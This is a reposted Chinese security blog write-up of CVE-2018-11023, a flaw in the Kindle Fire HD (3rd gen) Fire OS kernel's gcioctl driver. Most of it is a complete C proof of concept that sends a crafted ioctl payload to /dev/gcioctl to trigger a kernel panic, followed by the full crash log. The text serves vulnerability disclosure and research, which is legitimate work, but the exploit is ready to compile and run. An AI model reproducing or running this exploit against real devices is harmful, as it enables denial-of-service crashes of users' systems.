(CVE-2018-11023)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞

admin
admin
admin
102223
文章
87
评论
2022年1月6日00:42:54评论46 views字数 12196阅读40分39秒阅读模式

一、漏洞简介

Amazon Kindle Fire HD(3rd)Fire OS 4.5.5.3的内核组件中的内核模块/omap/drivers/misc/gcx/gcioctl/gcif.c允许攻击者通过设备/ dev上ioctl的参数注入特制参数/ gcioctl使用命令3222560159,并导致内核崩溃。

二、漏洞影响

Fire OS 4.5.5.3

三、复现过程

poc:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
 
/*
 * This is poc of Kindle Fire HD 3rd
 * A bug in the ioctl interface of device file /dev/gcioctl causes the system crash via IOCTL 3222560159. 
 * This Poc should run with permission to do ioctl on /dev/gcioctl.
 *
 */
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/ioctl.h>

const static char *driver = "/dev/gcioctl";
static command = 3222560159; 

int main(int argc, char **argv, char **env) {
        unsigned int payload[] = { 0x244085aa, 0x1a03e6ef, 0x000003f4, 0x00000000 };

        int fd = 0;
        
        fd = open(driver, O_RDONLY);
        if (fd < 0) {
            printf("Failed to open %s, with errno %d\n", driver, errno);
            system("echo 1 > /data/local/tmp/log");
            return -1;
        }
        
        printf("Try open %s with command 0x%x.\n", driver, command);
        printf("System will crash and reboot.\n");
        if(ioctl(fd, command, &payload) < 0) {
            printf("Allocation of structs failed, %d\n", errno);
            system("echo 2 > /data/local/tmp/log");
            return -1;
        }
        close(fd);
        return 0;
}

崩溃日志

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
 
[   79.825592] init: untracked pid 3232 exited
[   79.830841] init: untracked pid 3234 exited
[   95.970855] Alignment trap: not handling instruction e1953f9f at [<c06a4d84>]
[   95.978912] Unhandled fault: alignment exception (0x001) at 0x1a03e6f3
[   95.986053] Internal error: : 1 [#1] PREEMPT SMP ARM
[   95.991638] Modules linked in: omaplfb(O) pvrsrvkm(O) pvr_logger(O)
[   95.999145] CPU: 0    Tainted: G           O  (3.4.83-gd2afc0bae69 #1)
[   96.006408] PC is at __raw_spin_lock_irqsave+0x38/0xb0
[   96.012115] LR is at _raw_spin_lock_irqsave+0x10/0x14
[   96.017791] pc : [<c06a4d88>]    lr : [<c06a4e10>]    psr: 20000093
[   96.017822] sp : d02bfdd8  ip : d02bfdf8  fp : d02bfdf4
[   96.030578] r10: 00000000  r9 : dd3eeca8  r8 : 00000001
[   96.036376] r7 : 1a03e6ef  r6 : 00000001  r5 : 1a03e6f3  r4 : d02be000
[   96.043701] r3 : 00000001  r2 : 00000001  r1 : 00000082  r0 : 20000013
[   96.050933] Flags: nzCv  IRQs off  FIQs on  Mode SVC_32  ISA ARM  Segment user
[   96.058990] Control: 10c5387d  Table: 96cb804a  DAC: 00000015
[   96.065460] 
[   96.065460] PC: 0xc06a4d08:
[   96.070404] 4d08  1a000003 eaffffe6 e5903000 e3530000 0affffe3 e5903004 e3530000 1afffff9
[   96.080810] 4d28  eaffffdf e50b0018 ebfffbab e51b0018 eaffffed e1a0c00d e92dd800 e24cb004
[   96.091217] 4d48  ebffffcf e89da800 e1a0c00d e92dd878 e24cb004 e1a0300d e3c34d7f e3c4403f
[   96.101776] 4d68  e1a05000 e3a06001 e5943004 e2833001 e5843004 e10f0000 f10c0080 e1953f9f
[   96.112335] 4d88  e3330000 01853f96 e3530000 0a000014 e121f000 e5943004 e2433001 e5843004
[   96.122894] 4da8  e5943000 e3130002 1a000010 e5953004 e3530000 e5953000 05856004 e3530000
[   96.133361] 4dc8  1a000003 eaffffe7 e5953000 e3530000 0affffe4 e5953004 e3530000 1afffff9
[   96.143920] 4de8  eaffffe0 f57ff05f e5853004 e89da878 ebfffb79 eaffffec e1a0c00d e92dd800
[   96.154479] 
[   96.154479] LR: 0xc06a4d90:
[   96.159393] 4d90  e3530000 0a000014 e121f000 e5943004 e2433001 e5843004 e5943000 e3130002
[   96.170013] 4db0  1a000010 e5953004 e3530000 e5953000 05856004 e3530000 1a000003 eaffffe7
[   96.180603] 4dd0  e5953000 e3530000 0affffe4 e5953004 e3530000 1afffff9 eaffffe0 f57ff05f
[   96.191070] 4df0  e5853004 e89da878 ebfffb79 eaffffec e1a0c00d e92dd800 e24cb004 ebffffcf
[   96.201690] 4e10  e89da800 e1a0c00d e92dd800 e24cb004 ebfffff6 e89da800 e1a0c00d e92dd800
[   96.212341] 4e30  e24cb004 ebfffff1 e89da800 e1a0c00d e92dd818 e24cb004 ebffffc0 e1a04000
[   96.222808] 4e50  ebe6a978 e121f004 e89da818 e1a0c00d e92dd800 e24cb004 ebfffff3 e89da800
[   96.233612] 4e70  e1a0c00d e92dd830 e24cb004 e24dd008 e1a0300d e3c34d7f e3c4403f e3a05001
[   96.244262] 
[   96.244262] SP: 0xd02bfd58:
[   96.249145] fd58  00000000 0000001d 00000004 d4736f80 d4737394 c06a4d84 20000093 ffffffff
[   96.259948] fd78  d02bfdc4 00000001 d02bfdf4 d02bfd90 c06a5318 c0008370 20000013 00000082
[   96.270660] fd98  00000001 00000001 d02be000 1a03e6f3 00000001 1a03e6ef 00000001 dd3eeca8
[   96.281311] fdb8  00000000 d02bfdf4 d02bfdf8 d02bfdd8 c06a4e10 c06a4d88 20000093 ffffffff
[   96.292053] fdd8  0000020a 00000082 1a03e6f3 d02be000 d02bfe04 d02bfdf8 c06a4e10 c06a4d5c
[   96.302825] fdf8  d02bfe14 d02bfe08 c06a4e24 c06a4e0c d02bfe5c d02bfe18 c06a3008 c06a4e20
[   96.313415] fe18  d84a38d8 d84a2800 d84a3800 0000000a d02be000 c33a3180 d02bfe54 1a03e6ef
[   96.323883] fe38  bed24608 d02be000 d627f000 bed24608 dd3eeca8 00000000 d02bfe6c d02bfe60
[   96.334533] 
[   96.334533] IP: 0xd02bfd78:
[   96.339416] fd78  d02bfdc4 00000001 d02bfdf4 d02bfd90 c06a5318 c0008370 20000013 00000082
[   96.349853] fd98  00000001 00000001 d02be000 1a03e6f3 00000001 1a03e6ef 00000001 dd3eeca8
[   96.360290] fdb8  00000000 d02bfdf4 d02bfdf8 d02bfdd8 c06a4e10 c06a4d88 20000093 ffffffff
[   96.370727] fdd8  0000020a 00000082 1a03e6f3 d02be000 d02bfe04 d02bfdf8 c06a4e10 c06a4d5c
[   96.381042] fdf8  d02bfe14 d02bfe08 c06a4e24 c06a4e0c d02bfe5c d02bfe18 c06a3008 c06a4e20
[   96.391479] fe18  d84a38d8 d84a2800 d84a3800 0000000a d02be000 c33a3180 d02bfe54 1a03e6ef
[   96.402008] fe38  bed24608 d02be000 d627f000 bed24608 dd3eeca8 00000000 d02bfe6c d02bfe60
[   96.412445] fe58  c06a319c c06a2fec d02bff04 d02bfe70 c0317c28 c06a3194 00000001 00000028
[   96.422790] 
[   96.422790] FP: 0xd02bfd74:
[   96.427795] fd74  ffffffff d02bfdc4 00000001 d02bfdf4 d02bfd90 c06a5318 c0008370 20000013
[   96.438140] fd94  00000082 00000001 00000001 d02be000 1a03e6f3 00000001 1a03e6ef 00000001
[   96.448699] fdb4  dd3eeca8 00000000 d02bfdf4 d02bfdf8 d02bfdd8 c06a4e10 c06a4d88 20000093
[   96.459289] fdd4  ffffffff 0000020a 00000082 1a03e6f3 d02be000 d02bfe04 d02bfdf8 c06a4e10
[   96.470031] fdf4  c06a4d5c d02bfe14 d02bfe08 c06a4e24 c06a4e0c d02bfe5c d02bfe18 c06a3008
[   96.480438] fe14  c06a4e20 d84a38d8 d84a2800 d84a3800 0000000a d02be000 c33a3180 d02bfe54
[   96.490875] fe34  1a03e6ef bed24608 d02be000 d627f000 bed24608 dd3eeca8 00000000 d02bfe6c
[   96.501495] fe54  d02bfe60 c06a319c c06a2fec d02bff04 d02bfe70 c0317c28 c06a3194 00000001
[   96.512023] 
[   96.512023] R4: 0xd02bdf80:
[   96.517089] df80  000003ef 61ef22a8 61ef2278 61ef22d8 00000036 c0013e08 00000000 d02bdfa8
[   96.527679] dfa0  c0013c60 c0136578 61ef22a8 61ef2278 0000000a c0186201 65490ce8 65490ce0
[   96.538208] dfc0  61ef22a8 61ef2278 61ef22d8 00000036 00000001 65393000 6253ab8c 4010f2ec
[   96.548797] dfe0  00000001 65490cd0 400f0273 400e3804 600f0010 0000000a 5788f1b0 0000000b
[   96.559356] e000  00000002 00000003 00000000 d4736f80 c0a0e840 00000000 00000015 c4fcf880
[   96.569885] e020  00000000 d02be000 c09ddc50 d4736f80 dd0be600 c1617b40 d02bfdf4 d02bfd40
[   96.580535] e040  c06a36e4 00000000 00000000 00000000 00000000 00000000 01000000 00000000
[   96.591125] e060  005bc4c0 5ebfea7f 00000000 00000000 00000000 00000000 00000000 00000000
[   96.601684] 
[   96.601684] R9: 0xdd3eec28:
[   96.606628] ec28  dd3eec28 dd3eec28 00000000 00000000 00000000 c06bc674 000200da c09dda58
[   96.617218] ec48  00000000 00000000 dd3eec50 dd3eec50 00000000 c0aa5174 c0aa5174 c0aa5148
[   96.627716] ec68  5aefd4d7 00000000 00000000 00000000 dd3eec80 00000000 00000000 00000000
[   96.638275] ec88  00200000 00000000 00000000 dd3eec94 dd3eec94 dd3d6fc0 dd3d6fc0 00000000
[   96.648864] eca8  000521a4 000003e8 000003e8 00000000 00000000 00000000 c06b9600 dd150400
[   96.659423] ecc8  dd3eed80 dd33ae70 00001064 00000001 0fb00000 5aefd4d7 2d2b4d15 5aefd4d7
[   96.669921] ece8  2d2b4d15 5aefd4d7 2d2b4d15 00000000 00000000 00000000 00000000 00000000
[   96.680572] ed08  00000000 00000000 00000000 00000000 00000001 00000000 00000000 dd3eed24
[   96.691162] Process gcioctl_poc_3 (pid: 3395, stack limit = 0xd02be2f8)
[   96.698455] Stack: (0xd02bfdd8 to 0xd02c0000)
[   96.703430] fdc0:                                                       0000020a 00000082
[   96.712554] fde0: 1a03e6f3 d02be000 d02bfe04 d02bfdf8 c06a4e10 c06a4d5c d02bfe14 d02bfe08
[   96.721588] fe00: c06a4e24 c06a4e0c d02bfe5c d02bfe18 c06a3008 c06a4e20 d84a38d8 d84a2800
[   96.730743] fe20: d84a3800 0000000a d02be000 c33a3180 d02bfe54 1a03e6ef bed24608 d02be000
[   96.739837] fe40: d627f000 bed24608 dd3eeca8 00000000 d02bfe6c d02bfe60 c06a319c c06a2fec
[   96.748840] fe60: d02bff04 d02bfe70 c0317c28 c06a3194 00000001 00000028 000fffff d02bfea0
[   96.757934] fe80: d02bfedc d02bfe90 c0207454 c00bd920 0000001e c33a3180 d02bfed4 d02bfea8
[   96.767059] fea0: 244085aa 1a03e6ef 000003f4 00000000 00000000 00000001 00000000 d02bff14
[   96.776214] fec0: 00000000 00000001 dd3eeca8 c24d8a00 d02bfefc d02bfee0 c02089fc 00000000
[   96.785247] fee0: d627f000 00000004 d627f000 bed24608 dd3eeca8 00000000 d02bff74 d02bff08
[   96.794403] ff00: c0136044 c0317448 00000000 00000000 00000000 00000001 00000000 dd045190
[   96.803649] ff20: dcf8c770 d02bff0c d02be000 bed24638 bed24608 c0145d9f d627f000 00000004
[   96.812744] ff40: d02be000 00000000 d02bff64 00000000 bed24608 c0145d9f d627f000 00000004
[   96.821746] ff60: d02be000 00000000 d02bffa4 d02bff78 c01365e0 c0135fc4 00000000 00000000
[   96.830932] ff80: 00000400 bed24638 00010e54 00000000 00000036 c0013e08 00000000 d02bffa8
[   96.840118] ffa0: c0013c60 c0136578 bed24638 00010e54 00000004 c0145d9f bed24608 bed24608
[   96.849121] ffc0: bed24638 00010e54 00000000 00000036 00000000 00000000 00000000 bed24624
[   96.858245] ffe0: 00000000 bed245ec 00010690 0002917c 60000010 00000004 006f0063 002e006d
[   96.867340] Backtrace: 
[   96.870330] [<c06a4d50>] (__raw_spin_lock_irqsave+0x0/0xb0) from [<c06a4e10>] (_raw_spin_lock_irqsave+0x10/0x14)
[   96.881591]  r6:d02be000 r5:1a03e6f3 r4:00000082 r3:0000020a
[   96.888488] [<c06a4e00>] (_raw_spin_lock_irqsave+0x0/0x14) from [<c06a4e24>] (_raw_spin_lock_irq+0x10/0x14)
[   96.899291] [<c06a4e14>] (_raw_spin_lock_irq+0x0/0x14) from [<c06a3008>] (wait_for_common+0x28/0x150)
[   96.909729] [<c06a2fe0>] (wait_for_common+0x0/0x150) from [<c06a319c>] (wait_for_completion_interruptible_timeout+0x14/0x18)
[   96.922149] [<c06a3188>] (wait_for_completion_interruptible_timeout+0x0/0x18) from [<c0317c28>] (dev_ioctl+0x7ec/0x10c4)
[   96.934204] [<c031743c>] (dev_ioctl+0x0/0x10c4) from [<c0136044>] (do_vfs_ioctl+0x8c/0x5b4)
[   96.943481] [<c0135fb8>] (do_vfs_ioctl+0x0/0x5b4) from [<c01365e0>] (sys_ioctl+0x74/0x84)
[   96.952636] [<c013656c>] (sys_ioctl+0x0/0x84) from [<c0013c60>] (ret_fast_syscall+0x0/0x30)
[   96.961822]  r8:c0013e08 r7:00000036 r6:00000000 r5:00010e54 r4:bed24638
[   96.970153] Code: e5843004 e10f0000 f10c0080 e1953f9f (e3330000) 
[   96.977264] Board Information: 
[   96.977264]  Revision : 0001
[   96.977294]  Serial	: 0000000000000000
[   96.977294] SoC Information:
[   96.977294]  CPU	: OMAP4470
[   96.977294]  Rev	: ES1.0
[   96.977325]  Type	: HS
[   96.977325]  Production ID: 0002B975-000000CC
[   96.977325]  Die ID	: 1CC60000-50002FFF-0B00935D-11007004
[   96.977355] 
[   97.013824] ---[ end trace 2432291f2b5d99ba ]---
[   97.019195] Kernel panic - not syncing: Fatal exception
[   97.025024] CPU1: stopping
[   97.028137] Backtrace: 
[   97.031311] [<c0018148>] (dump_backtrace+0x0/0x10c) from [<c0698bb8>] (dump_stack+0x18/0x1c)
[   97.040679]  r6:c09ddc50 r5:c09dc844 r4:00000001 r3:c0a0e950
[   97.047668] [<c0698ba0>] (dump_stack+0x0/0x1c) from [<c0019bd8>] (handle_IPI+0x190/0x1c4)
[   97.056884] [<c0019a48>] (handle_IPI+0x0/0x1c4) from [<c00084fc>] (gic_handle_irq+0x58/0x60)
[   97.066253] [<c00084a4>] (gic_handle_irq+0x0/0x60) from [<c06a5380>] (__irq_svc+0x40/0x70)
[   97.075561] Exception stack(0xd6cb7d28 to 0xd6cb7d70)
[   97.081237] 7d20:                   c1620b40 c3152ac0 d799dc70 00000000 00000000 c1620b40
[   97.090454] 7d40: d6cb6000 c4eaaf80 00000001 c4eaaf80 c1620b40 d6cb7d7c d6cb7d80 d6cb7d70
[   97.099670] 7d60: c0074004 c06a4880 60070013 ffffffff
[   97.105346]  r6:ffffffff r5:60070013 r4:c06a4880 r3:c0074004
[   97.112487] [<c06a485c>] (_raw_spin_unlock_irq+0x0/0x50) from [<c0074004>] (finish_task_switch+0x58/0x12c)
[   97.123321] [<c0073fac>] (finish_task_switch+0x0/0x12c) from [<c06a36fc>] (__schedule+0x3ec/0x830)
[   97.133239]  r8:c3152ac0 r7:c09ddc50 r6:d6cb6000 r5:c09b6b40 r4:c4fcf340
[   97.141143] r3:00000001
[   97.144500] [<c06a3310>] (__schedule+0x0/0x830) from [<c06a3c24>] (preempt_schedule+0x40/0x5c)
[   97.154174] [<c06a3be4>] (preempt_schedule+0x0/0x5c) from [<c06a4808>] (_raw_spin_unlock+0x48/0x4c)
[   97.164337]  r4:c0a7375c r3:00000002
[   97.168731] [<c06a47c0>] (_raw_spin_unlock+0x0/0x4c) from [<c00983d0>] (futex_wake+0xfc/0x130)
[   97.178436] [<c00982d4>] (futex_wake+0x0/0x130) from [<c0099868>] (do_futex+0xf8/0x9e8)
[   97.187469] [<c0099770>] (do_futex+0x0/0x9e8) from [<c009a1ec>] (sys_futex+0x94/0x178)
[   97.196289] [<c009a158>] (sys_futex+0x0/0x178) from [<c0013c60>] (ret_fast_syscall+0x0/0x30)
[   97.205871] CPU0 PC (0) : 0xc003ee38
[   97.209930] CPU0 PC (1) : 0xc003ee54
[   97.214111] CPU0 PC (2) : 0xc003ee54
[   97.218170] CPU0 PC (3) : 0xc003ee54
[   97.222229] CPU0 PC (4) : 0xc003ee54
[   97.226409] CPU0 PC (5) : 0xc003ee54
[   97.230468] CPU0 PC (6) : 0xc003ee54
[   97.234527] CPU0 PC (7) : 0xc003ee54
[   97.238739] CPU0 PC (8) : 0xc003ee54
[   97.242767] CPU0 PC (9) : 0xc003ee54
[   97.246826] CPU1 PC (0) : 0xc0019b2c
[   97.251007] CPU1 PC (1) : 0xc0019b2c
[   97.255065] CPU1 PC (2) : 0xc0019b2c
[   97.259124] CPU1 PC (3) : 0xc0019b2c
[   97.263183] CPU1 PC (4) : 0xc0019b2c
[   97.267364] CPU1 PC (5) : 0xc0019b2c
[   97.271423] CPU1 PC (6) : 0xc0019b2c
[   97.275482] CPU1 PC (7) : 0xc0019b2c
[   97.279693] CPU1 PC (8) : 0xc0019b2c
[   97.283752] CPU1 PC (9) : 0xc0019b2c
[   97.287811] 
[   97.289581] Restarting Linux version 3.4.83-gd2afc0bae69 (build@14-use1a-b-39) (gcc version 4.7 (GCC) ) #1 SMP PREEMPT Tue Sep 19 22:04:47 UTC 2017
[   97.289611]

FROM :ol4three.com | Author:ol4three

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月6日00:42:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   (CVE-2018-11023)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞https://cn-sec.com/archives/720863.html

发表评论

匿名网友 填写信息